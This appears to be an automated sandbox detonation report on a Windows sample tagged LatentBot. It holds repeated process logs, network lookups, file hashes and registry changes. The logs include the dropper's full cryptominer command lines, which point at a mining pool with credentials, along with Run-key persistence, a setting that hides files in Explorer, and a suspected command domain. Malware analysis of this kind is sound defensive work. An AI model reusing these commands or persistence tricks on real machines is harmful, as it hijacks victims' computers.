C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | superwaffles.zapto.org | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| NL | 173.194.69.94:80 | c.pki.goog | tcp |
Files
C:\Users\Admin\AppData\Roaming\explorer.exe
| MD5 | c4ad493a6bfd212c4e1418ba605020af |
| SHA1 | 20272ac81bd1df68603924ae3b1fe4c2df034a29 |
| SHA256 | 492bd918e98e5802cf1ff5d3f0537567a7657477fff9cb5e7657448f64ead496 |
| SHA512 | 736487e85b4986284139599befb69a3483108c6199e6737524aafad9daa8614e67ab244859d71affacbcebba8e07af91fb2c4c10484f7988fa7dacd51897ccaf |
Analysis: behavioral2
Detonation Overview
Submitted
2025-04-20 05:30
Reported
2025-04-20 05:32
Platform
win11-20250410-en
Max time kernel
150s
Max time network
146s
Command Line
Signatures
LatentBot
Latentbot family
Modifies visiblity of hidden/system files in Explorer
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe | N/A |
Executes dropped EXE
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
